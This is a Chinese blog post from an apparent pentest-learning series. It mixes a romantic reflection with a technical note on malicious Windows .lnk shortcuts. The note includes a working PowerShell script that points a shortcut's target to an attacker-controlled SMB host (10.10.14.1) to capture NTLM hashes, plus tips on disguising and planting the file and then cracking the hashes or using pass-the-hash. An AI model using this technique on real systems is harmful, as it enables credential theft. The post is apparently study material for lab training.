iT邦幫忙

2025 iThome 鐵人賽

DAY 16
0

通往核心的路徑


喜歡一個人,是否只是因為—

「在他/她身上,看見了自己渴望成為的樣子?」

當我看見他的安靜專注、直接、勇敢和真實(或者,那種可以精準用 exploit 爆擊的樣子),

心裡就會產生一種奇怪的迷戀。

那感覺就像點擊了一個 .lnk

它偽裝成再普通不過的捷徑,

卻在一瞬間把我送進了最深的核心。

我開始懷疑...

這條路徑指向的不只是他,

而是那個我渴望成為的未來版本的自己。

Hashtag: #所以,該下船了嗎?


技術筆記:惡意 .lnk (Windows Shortcut) 檔案

.lnk(捷徑檔)的原理

.lnk 檔是一個「Windows 快捷方式」。

在捷徑裡,我們可以指定 TargetPath,這個路徑可以是本機程式,也可以是網路 UNC 路徑(例如 \192.168.1.100\share\icon.png)。

當使用者「瀏覽」這個捷徑檔時 ...

Explorer 會嘗試載入它 → 去訪問那個 UNC 路徑 → 就會自動送出 NTLM 驗證請求。

所以攻擊流程可以是:

  • 我們先架設一個伺服器(例如用 Responder 監聽 SMB)。

  • 製作一個指向 \... 的 .lnk。

  • 把這個 .lnk 丟到受害者能看到的地方(桌面、共享資料夾、Email 附件等)。

  • 只要他一打開資料夾,不用點捷徑,就會嘗試存取那個圖示或目標路徑。

  • NTLM hash 流到我們這裡,就能抓取或暴力破解。

PowerShell 範例:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\10.10.14.1\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "只要瀏覽存放此檔案的目錄,就會觸發一個驗證請求。"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

解釋:

  • TargetPath 指向我們的伺服器,所以可以把 10.10.14.1 換成你的 attackerIP。

  • IconLocation 給它一個正常的圖,不要太可疑。

  • 存檔 → 丟給目標。

工具輔助

  • Lnkbomb:自動化幫我們生成很多 .lnk,省得手寫。

  • Responder / Inveigh:用來接收並記錄目標傳回的 NTLM hash。

滲透流程中可以怎麼用?

如果發現 .scf 無法用了(Server 2019 / Windows 10+),就試試 .lnk。

放到共享資料夾、USB等,讓目標不小心打開。

其實這就是被動 hash 捕獲技術,通常下一步是:

離線破解 hash(用 hashcat)或 Pass-the-Hash。


小語

# 其實說實話,你喜歡誰已經不太重要了 XD
# 不過,未來的故事誰知道呢?

參考資源

HTB Academy - Windows Privilege Escalation - Interacting with Users:
https://academy.hackthebox.com/module/67/section/630


上一篇
加班的日子有你有我
下一篇
我們的使用者互動實驗
系列文
Hack the Boyfriend: 為了 CTF 帥哥,我貢獻了我的肝臟26
圖片
  熱門推薦
圖片
{{ item.channelVendor }} | {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言